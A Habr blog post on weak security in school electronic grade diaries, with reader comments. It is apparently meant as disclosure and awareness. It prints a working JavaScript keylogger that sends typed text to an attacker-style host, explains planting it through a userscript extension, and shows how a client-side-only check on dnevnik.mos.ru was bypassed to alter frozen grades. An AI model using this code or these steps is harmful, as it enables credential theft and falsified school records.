Добрый день, хабраюзер!
В этом топике будет затронута проблема, связанная с организацией надежности цифровых информационных систем, являющихся частью процесса современного образования. Если говорить конкретно, то электронных дневников.
Как известно, цифровые внедрения нынче повсеместны: школы и университеты заводят собственные странички в социальных сетях и блогах для информирования о происходящем, редкое учебное заведение не имеет собственного сайта, а электронные журналы вот-вот окончательно вытеснят бумажные… И это лишь часть тех перемен, которые происходят у нас на глазах. Конечно же, в информационный век этому уже не приходится удивляться: люди привыкли, что вся интересующая их информация находится интернете.
Очевидно, эти процессы инкапсулируют в себе и немалую ответственность как со стороны пользователей, так и со стороны разработчиков. Теперь недостаточно, уходя из кабинета, запирать дверь на ключ, оставляя позади нее всё важное. В цифровом мире физическая недоступность не является гарантией безопасности (однако, несомненно, этот аспект крайне важен в плане обеспечения комплексной безопасности). Но, обо всем по порядку.
Проблема #1: человеческий фактор.
«Самая большая уязвимость любой информационной системы — это её пользователь»(с)
С этим высказыванием трудно поспорить — человек есть человек. Именно эта проблема является ключевой в плане надежности и безопасности информационных ресурсов как со стороны пользователей, так и разработчиков. Эта проблема актуальна ровно столько, сколько существует сам человек, а поэтому она не относится к цифровому миру, как таковому. Ведь и во времена, предшествующие цифровым, например, бумажный журнал было доверено переносить конкретному человеку (старосте, кажется), который, в общем-то, мог бы пользоваться своим положением или быть использованным другими своими одногруппниками, что в конечном счете вполне могло привести к подделке оригинальной информации, ее компроментации. Другой пример, когда виновниками выступают уже не доверенные лица, а непосредственные «владельцы» информации. Если рассматривать это на конкретном примере, то легко представить себе обычного, скажем, секретаря, не подумавшего не только забрать, но и вообще закрыть журнал с важной информацией на время своего отсутствия в кабинете. Такое бывает и нередко. Это также может привести к утечке/подделке важных для учреждения сведений.
В современное время примеры неаккуратности человеческого фактора остаются идентичными, разве что бумажки заменяются компьютерами. На самом деле это несет еще большую угрозу. Если запрограммировать и «заразить» бумажку было нельзя, то с компьютерами все обстоит иначе.
Редкий сотрудник (по крайней мере, в сфере школьного образования) нажимает Win+L, отлучаясь по делам, некоторых в принципе не заботит, стоят ли пароли на их учетных записях Windows, а третьи вообще пускают за свой ноутбук чуть ли ни каждого встречного… Все это лишь усугубляет и без того ненадежные системы. Вы можете использовать самые безопасные браузеры, накачать дюжину различных антивирусов и даже использовать уникальный пароль учетной записи, но если пускать за свое место других людей без пристального наблюдения за их действиями, ничто не сможет гарантировать надежность рабочего места и отсутствие утечек.
Теперь хотелось бы привести простой пример эксплуатации «человеческого фактора».
Есть добрый преподаватель географии Иван Иванович, который попросил своего «ученика-компьютерщика» Антона Антоновича разобраться с тем, почему на его компьютере нет звука в презентации(обычная проблема). Ученик, быстро разобравшись с проблемой, пока Иван Иванович пишет на доске материал к следующему уроку, подумывает о перехвате данных своего учителя с этого компьютера(часто это почта, логины-пароли от соц.сетей и электронных журналов и т.д). Заранее Антоном был заготовлен злобный JavaScript-сценарий, являющийся частью его self-made сниффера:
(function(){
THIEF = "http://my_evil_domain.com/thief.php";
function grab(e)
{
var o = e.srcElement;
var img = new Image();
var text = o.value;
if(!text || typeof text == "undefined")
text = o.innerHTML;
if(!text || typeof text == "undefined" || (text+"").trim().length==0)
return;
img.src = THIEF+"?stolendata="+encodeURIComponent(text)+
"&urlfromdata="+encodeURIComponent(location.href.toString())+
"&domdata="+encodeURIComponent(o.getAttribute("id")+" ||| ."+ o.getAttribute("class"));
img.width="1px";
img.height="1px";
img.id="taken_data_sender";
try{
var oldImg = document.getElementById(img.id.toString());
document.body.removeChild(oldImg);
}catch(e){}
document.body.appendChild(img);
return true;
}
function connect_signal(selector)
{
var elements = document.getElementsByTagName(selector);
for(var el in elements)
elements[el].addEventListener('keyup', grab, false);
}
var selectors = ['*'];
for(var k in selectors)
connect_signal(selectors[k])
})();
И «ученик-компьютерщик» решает встроить свой скрипт внутрь любимого браузера Ивана Ивановича. Сделать Антон это может как стандартными средствами, предоставленными непосредственно браузерами, так и сторонними, вроде расширений TamperMonkey(Chrome), GreaseMonkey(FireFox) и т.д. После чего он довольно встает с захваченного PC и идет с улыбкой к любимому учителю географии, информируя его о починке исходной проблемы. Но с этого момента все вводимые данные на захваченном компьютере будут течь к Антону. Для более пущего эффекта он может сбросить всю историю браузера, включая запомненные ранее аутентификационные данные из форм.
Кроме того, Антон может попытать счастье и постараться вытащить пароль учетной записи Windows, используя средства наподобие wce (WindowsCredentialsEditor). Ведь вряд ли у Ивана Ивановича десяток различных паролей — так ведь неудобно — поэтому, вполне вероятно, что всего один единственный ;)
Проблема #2: ненадежность информационных ресурсов(электронных журналов)
Начать, пожалуй, следует с того, что ни один электронный журнал, встретившийся мне, не обладал должной системой защиты и системой выявления несанкционированного доступа. Я не хотел бы их перечислять. Все они, с точки зрения *безопасной* авторизации, напоминали какие-то форумы и многочисленные сайты-пиратки, построенные на движке DLE. Везде для входа в свой кабинет нужно было лишь указать логин(который часто представлял из себя email) и пароль. Ни о какой истории входов-выходов и информации об открытых «висячих» сессиях и речи нет. Однако данные, находящиеся внутри, все же представляют определенную ценность.
Рассмотрим пример на реально существующем электронном журнале, который функционировал в течении целого года.
Предположим, тот самый «ученик-компьютерщик» этим же вечером, придя домой и проанализировав свой лог, получил несанкционированный доступ к учетной записи преподавателя:
авторизовавшись, Антон увидел следующую картину:
что натолкнуло его на мысль о том, что имея в руках auth-данные лишь одного сотрудника своего образовательного учреждения(Ивана Ивановича), он может управлять всеми оценками любого юнита, входящего в состав этого учреждения. Это довольно странно, ведь это идет вразрез с простейшими правилами доступа.
Однако к служебной и конфигурационной информации у простого преподавателя доступа все же нет. Зато такой доступ есть у аккаунта администратора учебного заведения:
Здесь приведен один из ключевых конфигурационных разделов журнала. Красным выделено то, что влияет на безопасность и достоверность данных. Далее я хотел бы показать, что часто подобные настройки являются лишь иллюзией, которая еще больше усугубляет положение: ответственные лица полагают, что информация месячной/недельной(и т.д) давности была проверена и заморожена навсегда. Однако, это не так.
Что-либо изменить просто так не удастся, т.к на данный момент уже прошло слишком много времени.
Но если заглянуть в исходный код и посмотреть, как все устроено, можно увидеть следующее:
Синим обозначено то, что якобы не подлежит замене, красным — что изменяемо. Сразу появляется мысль подставить данные из уязвимого красного блока в синий, т.е заменить SPAN на INPUT. После срабатывания JS-события onChange происходит следующее:
Сработала одна из систем, отвечающих за надежность данных. Однако, если вспомнить, что есть HTML-сущности, то комментарий можно будет скрыть.
После нажатия на кнопку и обновления страницы можно увидеть:
Замороженные данные были подвержены изменению? Да. А причина тому кроется в том, что разработчики данного дневника не подумали проверять данные на серверной стороне. Они доверчиво принимают параметры от клиента, а сервер, как зомби, тупо прожевывает их, не сомневаясь в надежности…
Но, как оказалось, комментарии можно и вовсе обойти, а присутствие/отсутствие на конкретном уроке подделать, что в общем-то уже менее серьезно. Достаточно перейти на страницу урока( ^ ссылка в заголовке таблицы ^ ):
Здесь есть возможность добавить оценку(значок «плюсик»), но не изменить уже существующую(замороженную). Красным цветом снова показано «уязвимое» место системы, а синим — его эксплуатация. Здесь просто воспользоваться методом замены не получится( нельзя просто так взять и заменить DIV на A ), потому что тег ссылки содержит в себе служебные параметры: ID оценки и ID человека, которому она принадлежит. По нажатию на ссылку всплывает окно, ассоциированное с данными оценки. Поэтому для эксплуатации придется совсем немного подкорректировать параметры ссылки:
Исходные данные:
1) <a id="m192609687_5296401_0" href="http://schools.dnevnik.mos.ru/marks.aspx?view=mark&school=54509&lesson=144407896&work=192609687&person=5296401" class="mark mX" title="Редактировать оценку">+</a>
2) <td id="w192604193_5296401" class="lpm tac mark5"><div style="display: inline" class="mark mG">5</div></td>
Аутпут:
<a id="m192604193_5296401_0" href="http://schools.dnevnik.mos.ru/marks.aspx?view=mark&school=54509&lesson=144407896&work=192604193&person=5296401" class="mark mX" title="Редактировать оценку">+</a>
Теперь, если произвести замену, изменить и обновить:
Снова удалось заменить замороженные данные. Даже без указания комментария(причины)!
Здесь также наблюдается уязвимость, связанная с односторонней проверкой данных.
Вот таким достаточно простым способом удалось обойти основной раздел, отвечающий за защиту и надежность самых важных данных электронного журнала.
Исследование HTTP-запросов показало, что комментарий не учитывается вообще — это просто сторонний параметр, который может быть и пустым(значение на пустоту проверяется на клиентской стороне).
Возможно, разработчики и проектировщики(если проектировщики вообще были) точно были уверены, что данными функциями будут пользоваться исключительно сотрудники образовательных учреждений… но, на худой конец, ведь вполне может быть и так, что ученик является родственником определенного сотрудника и они пользуются общим компьютером…
Проблема #3: нежелание исправлять свои ошибки.
В начале описания проблемы#2 было сказано, что уязвимый электронный журнал функционировал в течении целого учебного года. Исследование же журнала было проведено почти в самом начале учебного года, разработчики и администрация были проинформированы, однако ни одной ошибки так и не было исправлено за всё прошедшее время. Вполне вероятно, что проблемой#1, связанной с человеческим фактором, воспользовалось множество учеников из разных образовательных учреждений, что в итоге могло привести к массовой подделке исходных данных. Проблема#2 лишь усугубляет эту ситуацию.
Сотрудники образовательных учреждений так же продолжают предоставлять доступ к своим компьютерам каждому встречному, не наблюдая за их действиями. Некоторые позаботились о смене своих «штатных» паролей(или их первоначальной установки). В целом ничего не изменилось, и уровень как безопасности, так и надежности остался на прежнем уровне.
Вывод
Проблема, как и положено, кроется в корне. Чтобы ее можно было как-то искоренить, необходимо заставлять людей задумываться о безопасности их рабочего места, о том, что вокруг «ходит» слишком много угроз. Утечка и несанкционированный доступ — часто лишь вопрос времени не только в контексте современных образовательных учреждений. Но на их примере очень легко убедиться в некомпетентности многих сотрудников. На примере электронного журнала(dnevnik.mos.ru) стало видно, что некомпетентность лишь одного человека может повлечь за собою крах, в данном случае, всей системы оценивания.
Многие школьные учителя еще только осваиваются в плане электронных ресурсов, но когда однажды(уже очень скоро) произойдет повсеместный полноценный переход от «олдскульных» бумажных журналов к электронным, необходимо будет уметь объективно оценивать угрозы не только пользователям, но и разработчикам подобных ресурсов. Необходима тщательно проработанная система авторизации, которая бы позволяла отслеживать неправомерный доступ; необходимы и системы логгирования входов и отслеживания открытых сессий текущего аккаунта; необходимо и как можно более сузить области ответственности отдельных аккаунтов.
Все это в конечном счете позволит доверять современным электронным дневникам и не сомневаться в информации, которую они призваны не только предоставлять, но и оберегать.
Комментарии (100)
Cartman
27.06.2015 23:20+1а что ЭЦП с токеном уже неактуальна? сделал дело — подтверди подписью личной.
Delphinum
27.06.2015 23:24+18В голове сразу представляется — сидит «ученик-компьютерщик» за рабочим местом учителя Ивана Ивановича и настраивает ему звук в презентациях, в то время, как ЭЦП токен вставлен в USB системника, потому что Ивану Ивановичу лень каждый раз вставлять и вынимать этот токен. Никакие технические и программные средства не спасут вас от безответственности и некомпетентности пользователей.
roboter
28.06.2015 14:26+4Эстония, цифровая подпись это ИД карта, которая действительно может быть воткнута когда человек отлучился, и пинкод. Конечно можно и кейлоггер установить, но вероятность крайне мала.
В Эстонии есть ee.ekool.eu
Cartman
28.06.2015 19:59есть токены таблетки. их нельзя воткнуть. если ты делаешь систему рассчитанную на раздолбаев, то надо рассчитывать на это. банки уже научились так делать давно.
titulusdesiderio
29.06.2015 10:38есть скотч
merlin-vrn
29.06.2015 11:00+1Срабатывает по замыканию токена. Если он уже был в гнезде, его надо убрать и подключить снова. Так что постоянная фиксация — не вариант.
JSmitty
27.06.2015 23:29+30Как школьный учитель в недалеком прошлом, по самой затее электронный дневник для педагога — зло. Это лишняя головная боль, и ноль полезности. Широко разрекламированный дневник.ру например (у нас он приказом внедрялся) от экселя ничем не отличался. Типичную двойную для школ бухгалтерию по журналам разработчики вообще не знают (это когда в журнал пишется одно — что по программе, по факту изучается другое — так как я, например, не имею морального права тратить избыточное время на легкую тему, если ученики не освоили сложную, плюс «покрывание» карантинов, школьных мероприятий, военных сборов у мальчишек и т.п. форс-мажоров).
Бумажные документы ни одна вменяемая школа не отменила, т.е. два раза делаем одну и ту же работу. Местный провайдер упал — и вся новомодная онлайн приблуда ушла в небытие. А уроки вести надо. И потом судорожно синхронизировать свои записки с этой фигнёй — радость невеликая. Тем более что импорта той же эксельки не было (минимум, пару лет назад).
Так что вопрос безопасности этих сервисов — надуманный. Никто в здравом уме как на первичные данные на них опираться не будет. Если журнал упадет, то именно школа получит по башке, а не какой-то там сервис, пусть и крышуемый из минобра. Никакой существенной опасности несанкционированный онлайн-доступ к электронному дневнику не представляет. Более того, даже исправления учеников в журнал бумажный ловятся «на раз», чего уж там говорить (была пара инцидентов за 5 лет работы).Delphinum
27.06.2015 23:52+2На моей прошлой работе столкнулся со следующей задачей: есть городского района администрация в которой функционирует мой целевой отдел. Сотрудники этого отдела занимаются тем, что получают пачку документов, печатают на их основе другие документы и передают их дальше. По сути, обычная бюрократическая практика, мало чем отличающаяся от заполнения школьного журнала. Документы, которые получает отдел, а так же результаты их работы очень важны (важнее школьного журнала), а за любые ошибки работники могут очень больно получить по шапке (возможно даже какая то уголовная ответственность). В этот отдел нужно было внедрить электронный документооборот.
ХабракатЕсли вы когда нибудь слышали о СЭД, то скорее всего у вас очень негативное мнение на этот счет. Как добросовестный работник и программист с не малым стажем, который очень любит свою работу и благословит компилятор как бога (скромность?), я взялся за эту работу желая только помочь работникам этого отдела, а нисколько не усложнить им жизнь. Изначально предлагался полный переход на безбумажный документооборот, но я предложил замечательное (на мой взгляд) решение.
Я разработал систему, позволяющую вносить информацию о входящей документации и с помощью нескольких простых действий, получать результирующие документы. То есть юридически-значимыми остался бумажный носитель, а система всего лишь позволила без двойной работы создать «двойную запись» (что способствует прозрачности в работе отдела, а так же снижает вероятность ошибки) и упростить/ускорить процесс создания результирующих документов.
Если спроецировать это на работу учителя, то получится следующее: у вас есть электронный дневник, который умеет печатать (заполнять) обычный школьный дневник, но одновременно делаеть это (заполнять дневник) становится проще, быстрее и точнее (меньше ошибок). Более того, программа позволяет расчитывать какие то статистические или итоговые показатели. С одной стороны, нет проблем безопасности, так как все данные из программы ежедневно сливаются на бумагу. С другой стороны, работать становится проще без лишней работы.
В итоге система сначала была встречена сотрудниками отдела в штыки, но буквально через пол года все были без ума от нее. Как подтверждение этому, одна сотрудница, которая пользовалась этой системой около года (женщина лет 50) сама (!) обучила себе замену когда ушла на месяц в отпуск.Mixim333
28.06.2015 10:21+1Буквально 2-3 недели назад реализовывал что-то похожее: раз в сутки на стороннем сервере формируется CSV-файл, содержащий ~10млн строчек некоторой информации по всей России; до создания моего приложения этот файл загружался в Excel, затем из него выбиралось ~100тыс строчек (элементарный фильтр), они сопоставлялись с другими данными, накладывался другой фильтр и т.д.=>в итоге получалось около 300 строк; по тз от самих сотрудников отдела реализовал приложение (точнее сайт, который использует мои библиотеки) и все эти операции стали занимать не несколько часов, а несколько минут; через пару дней мой диалог с сотрудниками: «Хорошо все сделано, замечательно, но нам бы еще выгрузку этих данных в Excel сделать» — «Зачем?» — «Ну как же, мы привыкли в Excel работать!». Разумеется, Excel был прикручен, но до меня так и не дошел объективный ответ на вопрос: «Зачем?», поскольку после работы над этой Excel'ькой, они вновь возвращаются на мой сайт, на другую страничку и вносят туда то, что занесли в этот Excel-файл.
Delphinum
28.06.2015 11:58+2Помнится был такой случай. Отделы, о которых я рассказал выше, должны периодически сверять свои документы с теми, кому они ушли. Другими словами, отдел передал в другой отдел 10 документов, через месяц первый отдел должен сесть со вторым отделом и посчитать, сколько документов пришло во второй отдел (10), сколько в этом отделе обработано и т.д. Своего рода инвентаризация.
С учетом того, что моя программа стояла как в первом, так и во втором отделе, логично предположить, что необходимость в такой инвентаризации отпадает сразу (база то одна и та же, а документы оттуда потеряться не могут в принципе), но меня сильно просили реализовать эту инвентаризацию, потому что «так положено». Ну я сделал им отчет, который тупо пишет на листе А4 — инвентаризация успешна, потерь нет.
sergey-b
28.06.2015 00:03Конечно исправление в журнале ловится, потому что у каждого преподавателя есть свой личный журнал-блокнот, который он никогда не выпускает из рук. И даже если школа сгорит, на следующий день коллектив восстановит всю историю за текущий учебный год по личным записям (кроме, наверное, физкультуры).
Насчет ноль полезности, это вы смотрите с точки зрения учителей, а для родителей электронные дневники очень полезны.Sarge
28.06.2015 00:53Кстати, интересно, насчёт полезности: зная нюансы, вы насколько будете доверять эл. дневнику как родитель? Сузим временную область поиска — в каком возрасте надо начинать контролировать соответствие записей в бумажном дневнике, электронном и в блокноте препода/учителя? Хочу для себя обозначить такие точки.
Newbilius
28.06.2015 10:50Ни в каком. Если ребёнок вам врёт, то значит вы где-то не туда свернули в воспитании, и с высокой долей вероятности вы его доверия уже вернуть не сможете. И прикрываясь лозунгами типа «это для его же блага» бесполезно.
Kolonist
28.06.2015 13:06+7Прям сразу и не туда. Я, например, никогда не рассказывал родителям о плохих оценках (и других проблемах), не потому что ругать будут, а чтобы не расстраивать. Всегда старался испраить оценки, чтобы за четверть было 4 или 5 — и родители так ничего и не знали. И всем хорошо, и мне, и им.
А с электронным дневником, у меня не было бы стимула исправлять плохие оценки. А зачем, если родители и так в курсе?boblenin
28.06.2015 18:09А на работе вы так же поступаете? Если что-то где-то закосячилось, то ни слова ни коллегам, ни руководству?
Kolonist
28.06.2015 18:16+3Вы действительно считаете, что то, что дети скрывают свои школьные оценки, как-то связано с их будущим поведением на работе?
boblenin
28.06.2015 18:23+1Мне показалось или вы считаете, что привычки полученые и выработаные в детстве не связаны с трудовой и профессиональной деятельностью?
Kolonist
28.06.2015 18:38+6Связаны. Но эта связь несколько более сложная, чем простое копирование шаблонов поведения из одной области в другую.
В числе прочего, я считаю, что активно внедряемая система тотального контроля за детьми, включающая мгновенный доступ родителей к оценкам, домашним заданиям, времени входа в школу и выхода из нее, приводит к потере самостоятельности в некоторой степени. Дети знают, что любой их шаг контролируется, в связи с чем, во-первых, боятся делать что-либо кроме сказанного, и во-вторых, теряют возможность исправления своих косяков до того, как родители о них узнают (о чем я и писал выше).
Кроме того, если несколько расширить мое высказывание выше, я считаю, что возможность исправить свой косяк до того, как о нем узнают родители, является дополнительным стимулом его исправлять. Это воспитывает, в том числе, и умение работать самостоятельно, самому исправлять свои ошибки, проявлять инициативу и изобретательность.
И нет, такое поведение не будет копироваться один к одному, как это описали вы. Скорее наоборот, у человека вырабатывается ответственность за результат своего труда, который необходимо достигнуть, независимо от возникающих в процессе сложностей. Т.е. сотрудник не будет бегать к коллегам и начальству с вопросами типа: «А у меня там сломалось, мне переделывать?», а будет самостоятельно принимать решение о том, что таки да, если там сломалось, значит надо переделать, ведь все ждут результата, а не нытья про то, что что-то ломается или не получается.boblenin
28.06.2015 20:14Похоже вы подменяете «Хьюстон у нас проблема», на «А у меня там сломалось, мне переделывать?». Прозрачность процесса не является противоположностью самостоятельности.
Надеюсь вы поняли о чем я.Kolonist
28.06.2015 20:18+1Похоже, что вы переоцениваете важность школьных оценок. Получение ребенком плохих промежуточных оценок ну никак не подходит под фразу: «Хьюстон, у нас проблема».
boblenin
28.06.2015 20:37Это ваше мнение. Причины плохих оценок могут быть какими угодно. Если о факте узнать раньше — можно разобраться в причинах. Точно то же самое в рабочем процессе.
Не все «у нас проблема» равны, но не всегда те, кто непосредственно исправляет проблему могут оценить всю опасность/сложность ситуации по причине банальной нехватки информации в контексте.Kolonist
28.06.2015 20:40Это ваше мнение
Разумеется! Все, что я говорю — это мое мнение, которое ни в коем случае не претендует на истину в последней инстанции. Точно то же самое касается и написанного вами.
Думаю, на том и порешим. Приятно было пообщаться, спасибо.
Daimos
30.06.2015 09:31Можно подумать вы о малейшей проблеме, которую вы накосячили, рассказываете всем подряд — это в человеческой природе заложено — казаться хорошим, и скрыть проблему и быстро переделать — так поступает подавляющее большинство людей.
demimurych
28.06.2015 01:08+2Тем не менее лично у меня перед глазами другой пример. Моя дочь учится в частной школе, где уже более 4 лет существует ТОЛЬКО электронный дневник. Не говоря уже обо всех других вещах вроде домашних заданий, которые так же в онлайне. т.е. никакого бумажного дневника, или бумажного журнала учителя нет и в помине.
Как родитель признаюсь что это очень удобно.
По поводу исправлений и стабильности сервиса. При правильной организации работы над подобным дневником, исправления в нем ловятся еще быстрее чем в бумажном.
Конечно, недоступность сервиса бывала, что естественно приводило к определенным проблемам как для учителей, таки для родителей, но на фоне других выгод с ними все были готовы мириться.merlin-vrn
28.06.2015 08:34+5Попробуйте представить, сколько безопасной и полезной самостоятельности отобрали у детей. Удобно? Для тотального контроля — да. А для развития ребёнка как будущего члена общества…
Kolonist
28.06.2015 13:10+9Сначала мы протестуем против тотальной слежки государства за нами, а потом сами же устанавливаем тотальную слежку за своими собственными детьми.
andyudol
28.06.2015 17:09+5Тем не менее лично у меня перед глазами другой пример. Моя дочь учится в частной школе, где уже более 4 лет существует ТОЛЬКО электронный дневник. Не говоря уже обо всех других вещах вроде домашних заданий, которые так же в онлайне. т.е. никакого бумажного дневника, или бумажного журнала учителя нет и в помине.
Попробуйте представить, сколько безопасной и полезной самостоятельности отобрали у детей. Удобно? Для тотального контроля — да. А для развития ребёнка как будущего члена общества…
Я попробовал. Не получилось. Готов спорить на любую сумму в пределах дневной зарплаты учителя, что demimurych тоже не сможет.
А онлайн курсы тоже лишают безопасной и полезной самостоятельности?
agmt
28.06.2015 22:44+1Какой самостоятельности? Как были дз, так и остались. Как был дневник, так и остался. Ну сменили бумагу на эвм и чо?
Как меняется тотальный контроль? В дневник учителя и так раньше писали, что думают. И просили принести с подписью родителя.
grossws
29.06.2015 01:00Для тотального контроля — да. А для развития ребёнка как будущего члена общества…
Смотря какого общества. В некоторых вариантах это как раз будет хорошим результатом. Не факт, правда, что в таком обществе захочется жить)
Mishok2000
28.06.2015 01:34Ну исправить незаметно оценочку в ЭЖ все же можно, главное, чтобы угол криворукости рук у ребенка был правильным + плохой с точки зрения безопасности ЭЖ. С технической части — возможно абсолютно без следов это сделать(думаю тут и спорить не надо). Тут все упирается в то, что сверяет ли учитель оценки своего «реального» журнала с отметками из ЭЖ, что в моей школе не все делают (или делают, но некачественно).
sergey-b
28.06.2015 02:07-3В нормальной системе незаметно поправить абсолютно невозможно. Во-первых, в современных базах пишутся журналы транзакций, в которых ничего поправить нельзя. Но и копаться в транзакциях не придется. Достаточно, чтобы при выставлении оценки родителям высылалось уведомление по электронной почте. Предположим, у нас хакеры уничтожили базу вместе с журналами транзакций и даже бэкапом. Тогда мы достаем все. что нам нужно из папки Отправленные школьного ящика и плюс еще можем сверить то, что оттуда достанем, с копиями из папки Входящие у родителей.
Mishok2000
28.06.2015 02:17Вы правы, но я же написал, что можно исправить оценку только, если безопасность храмает у ЭЖ. К сожалению, таких небезопасных систем у нас очень много, поэтому и напрашиваются выводы, которые я высказал выше.
merlin-vrn
28.06.2015 08:49+2В топике описана совершенно ненормальная система — мало того, что глупейшие ошибки видны сразу, о них сообщили и они не исправлены через год. И я готов спорить, что все остальные системы — не особенно лучше.
Например, ваша уверенность по поводу «отправленных» — это ужасное дилетатнство. Отправка вообще может вестись с адреса, который «не существует» и почта по которому не принимается — и так делается (и правильно) в подавляющем большинстве случаев, вы наверняка видели адреса типа noreply@domain.com; в системе может не быть ящика, в который попала бы почта, полученная с таким адресом получателя. Но даже если ящик существует, это — ящик для входящих, никаких «отправленных» там нет. Функционал «отправленных» — это исключительно фича почтовых клиентов, которыми вы пользуетесь; либо эти «отправленные» хранятся непосредственно в клиенте (если используется связка SMTP+POP3), либо клиент передаёт письмо дважды — сначала отправляет получателю по SMTP, потом оно загружается по IMAP в «отправленные» на сервере. Отправлялки с сайта ни локальных «отправленных», ни тем более IMAP не умеют — это всегда тупые SMTP-клиенты, часто даже толком не умеющие использовать аутентификацию.
Можно сохранять все отправляемые по SMTP письма средствами сервера, но опять же, так никогда не делается. (Я не проверял, но что-то подсказывает мне, что так не делает даже гугол со своим гмейлом.)
Во-вторых, кроме этих ошибок могут быть уже более тонкие. SQL-инъекции, например. Если заменить оценку в базе посредством инъекции, наверняка никакое письмо не будет отсылаться. Вряд ли отсылка письма встроена в триггер AFTER UPDATE. Вот лог операций туда вполе вероятно пишется — в духе «когда, что и на что меняли» — другой информации у триггера нет, так что заметить обновление таблицы будет возможно, но вот определить, чем (и кем) оно вызвано, будет трудновато.bitterman
28.06.2015 10:07Я извиняюсь, а что мешает письмо отправлять на два адреса: родителю и самому себе? Всю переписку так веду и всё равно мне, что там веб-клиенты умеют — вся история переписки под рукой.
merlin-vrn
28.06.2015 10:58-1не извиняйтесь :)
В ручной переписке — ничего не мешает. А в автоматической… типичные веб-отправлялки и так еле-еле умеют аутентифицироваться, а вы от них хотите отправлять почту на два адреса. Реально проще использовать фичу наподобие always_bcc в postfix, и есть случаи, когда мы её задействовали… но это совершенно не про школьные дневники.FYR
30.06.2015 13:49Скажем так, электронную версию можно бекапить. например раз в неделю. Носители будут «read-only» в которых изменить «просто так» ничего нельзя. В итоге у ученика остается меньше недели на «тонкую SQL-иньекцию». Лог транзакций в виде дифа так же можно хранить и бекапить. Более того во всех грамотных системах так и делается, это еще с бухучета ведется. В итоге ученику придется поправить запись о записи, что еще сложнее. Кроме того я бы еще ввел какую нибудь CRC чтобы следующая запись зависела от предыдущей, и каждый день все ставился чекпоинт «оценки» нет — тогда будет невозможно поправить запись задним числом.
curlydevil
28.06.2015 10:25Во-первых, данные школы не должны быть зависимы от сторонних сервисов. Хотя бы какой-нить локальный кеширующий сервер. В идеале — просто серверная иерархия, и слив оценок за день по расписанию — хоть раз в день, хоть раз в неделю. После слива оценок — их блокировка от возможных изменений.
Отсутствие дублирования проверок/условий на сервере — дикость и тупость создателей. Кодили исключительно фронтэндщики, чтоль? Про REST и API, видимо, узнают через лет 5…
Отмена бумажного документооборота — это долгий процесс, особенно в госучреждениях. Даже на заводе, где я работал некогда админом, бухгалтера дублировали все записи в DOS'оское приложение и в программулину, разрабатываемую программистами завода на Delphi.
Тем не менее когда появились Zebra-принтеры штрихкодов, планшеты и USB-сканеры штрихкодов, на складах поставили компьютеры с теми же принтерами и сканерами — весь складской персонал резко освоил технику, и от кучи волокиты избавились. Теперь на складе вся продукция была со штрихкодами, и найти «именно ту бухту кабеля» стало легко и ненапряжно — просто пробежать и прощёлкать сканером.
На текущей работе делали внутреннюю систему учёта отпусков, теперь добавили систему учёта переработок и дежурств. Переработки аппрувит директор, в конце месяца отчет приходит в бухгалтерию, и на его основе начисляется з/п.
Первый месяц — дублирование записей, проверка конечного результата на совпадение, да и тесты на код тоже есть. Дальше — только автоматизация.
Для перехода на электронный документооборот главное, что нужно — это чёткий пинок начальства что это надо сделать и с какого числа. По-другому — никак.merlin-vrn
28.06.2015 11:02+1Во-первых, данные школы не должны быть зависимы от сторонних сервисов.
школы так или иначе уже зависимы от всяких РОНО и министерства, а поэтому если сервис дневников будет реализован на базе этого же самого РОНО или министерства, дополнительных зависимостей не появится. В случае сбоев некому будет ругать школу за, например, непредоставление данных
А для непосредственно образовательного процесса история оценок не очень-то нужна, я бы сказал — даже вредна. Ситуация, когда «зачётка работает на тебя» плоха в смысле качества обучения.
boblenin
28.06.2015 18:13Внутренний сервер — это как минимум приходящий персонал для обслуживания.
WorksIsGone
28.06.2015 21:01плюс какая-никакая, инфраструктура. Упс, кондиционер, запираемая коморка.
AlNinyo
28.06.2015 19:45+9Как школьный учитель прямо сейчас не могу с вами согласиться. Лично для меня Зло — бумажный журнал, в который я вечно забываю/не успеваю вписать всё, что надо. В нашей школе (окраина областного центра, 500 учеников) уже много лет используется ЭЖ от фирмы«АВЕРС» (не сочтите рекламой). К сожалению, пока что он используется параллельно с бумажным, но есть шансы, что от бумажного откажемся скоро.
Есть в этом журнале свои проблемы, конечно же, но в они не такие страшные. Доступ у простого учителя есть только к своим предметам и своим классам, у классного руководителя — к предметам своего класса. Плюс весь ЭЖ завязан на школьную базу, точнее, на систему управления школой от этой же фирмы (КРМ «Директор»).
Мне гораздо проще на уроке/перемене выбрать в ЭЖ нужный класс, из заранее заведённого (экспорт из Экселя) тематического планирования по конкретному классу (можно изменять в любой момент, даже уже проведённое — удобно для педагога, хоть и не очень с точки зрения безопасности, наверное) выбрать тему урока, выбрать тип урока (не обязательно, но удобно — лабораторные и прочие контрольные своими цветами выделяются в списке), прописать д/з, а в поле комментария написать «не было/провели контрольную вместо лабораторной» или ещё что-то. Дошло до того, что по некоторым классам я бумажный журнал в конце четверти заполняю :) Периодически делаю экспорт оценок в Эксель и сохраняю на компе. Чисто для страховки.
Ещё для нас плюс в том, что этот ЭЖ лежит на нашем сервере внутри школы и никак не зависит от провайдера. Точнее, от провайдера зависит только доступ к нему родителей или учителей из дома.
Последние пару лет у нас в области пытаются внедрить типабесплатный для школ ЭЖ местной разработки. Пока это такое УГ по сравнению с аверсовским, что даже говорить про них не хочется.
Простите, если получилось похоже на рекламный пост. Основная мысль, которую хотел донести: ЭЖ удобнее, чем обычный. Хотя бы тем, что 1 раз потратил немного времени на заполнение планирования и потом не мучаешься его переписыванием в журнал (терпеть не могу писать).
auine
27.06.2015 23:53-1Потому что, сидит бабушка в классе и ей абсолютно все равно, что там новенького есть. ПК в классе у нее нет, ей проще ручкой написать. Потому, что введение этой сестемы требует времени и сил, примерно в равной степени как если это не вводить вовсе. Потому, что все сидят и думают когда уже можно будет пойти домой или же взять отпуск, а не почему же мы до сих пор не юзает электронный дневник :)
andyudol
30.06.2015 22:08Я на бабушку даже очень издалека не похож. Но тем не менее, мне абсолютно по барабану, что там новенького приготовлено на мою голову. Потому что гемор и головняк обеспечены «изкаропки».
Mishok2000
28.06.2015 01:13+12Спасибо за статью, было интересно почитать. Немного расскажу о электронном журнале своей школы, в которой я непосредственно сейчас учусь.
Она используют сервис «АИАС АВЕРС: Электронный Журнал» в качестве эж. И, честно говоря, он почти не защищен. Чтобы изменить свои оценки без знания пароля и логина админа, мне понадобилось примерно пол дня. Хотя я уже забыл, как это делается, но вот небольшая инструкция:
